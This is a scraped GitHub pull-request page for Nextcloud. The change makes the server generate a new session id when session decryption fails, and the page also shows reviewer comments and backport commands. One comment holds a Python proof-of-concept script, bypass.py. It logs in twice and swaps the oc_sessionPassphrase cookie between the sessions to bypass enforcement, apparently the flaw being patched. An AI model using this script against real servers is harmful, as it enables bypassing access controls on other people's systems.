Generate a new session id if the decrypting the session data fails #24550
Conversation
Signed-off-by: Roeland Jago Douma <[email protected]>
rullzer
requested review from
ChristophWurst,
MorrisJobke,
juliusknorr and
nickvergessen
| ); | ||
| } catch (\Exception $e) { | ||
| $this->sessionValues = []; | ||
| $this->regenerateId(true, false); |
There was a problem hiding this comment.
Those are the default values, so skip?
There was a problem hiding this comment.
I'd rather be explicit here
There was a problem hiding this comment.
#!/usr/bin/python3
python3 -m pip install requests beautifulsoup4
python3 bypass.py
from requests import Session
from bs4 import BeautifulSoup
class NextCloud(object):
def init(self, baseURL):
self.session = Session()
self.baseURL = baseURL
def login(self, data):
response = self.session.get(f'{self.baseURL}/login')
soup = BeautifulSoup(response.text, 'html.parser')
data.update({
'requesttoken': soup.find('head')['data-requesttoken']
})
self.session.post(f'{self.baseURL}/login', data = data)
def getCookies(self):
return self.session.cookies.get_dict()
if name == 'main':
baseURL = 'http://nextcloud.diefunction.local'
data = {
'user': 'bypass',
'password': 'NextCloudEnforcement'
}
firstSession = NextCloud(baseURL)
secondSession = NextCloud(baseURL)
firstSession.login(data)
secondSession.login(data)
cookies = firstSession.getCookies()
cookies['oc_sessionPassphrase'] = secondSession.getCookies()['oc_sessionPassphrase']
print(f'[Cookies] {cookies}') # change your browser cookies to bypass enforcement
|
/backport to stable20 |
|
/backport to stable19 |
|
/backport to stable18 |
Signed-off-by: Roeland Jago Douma [email protected]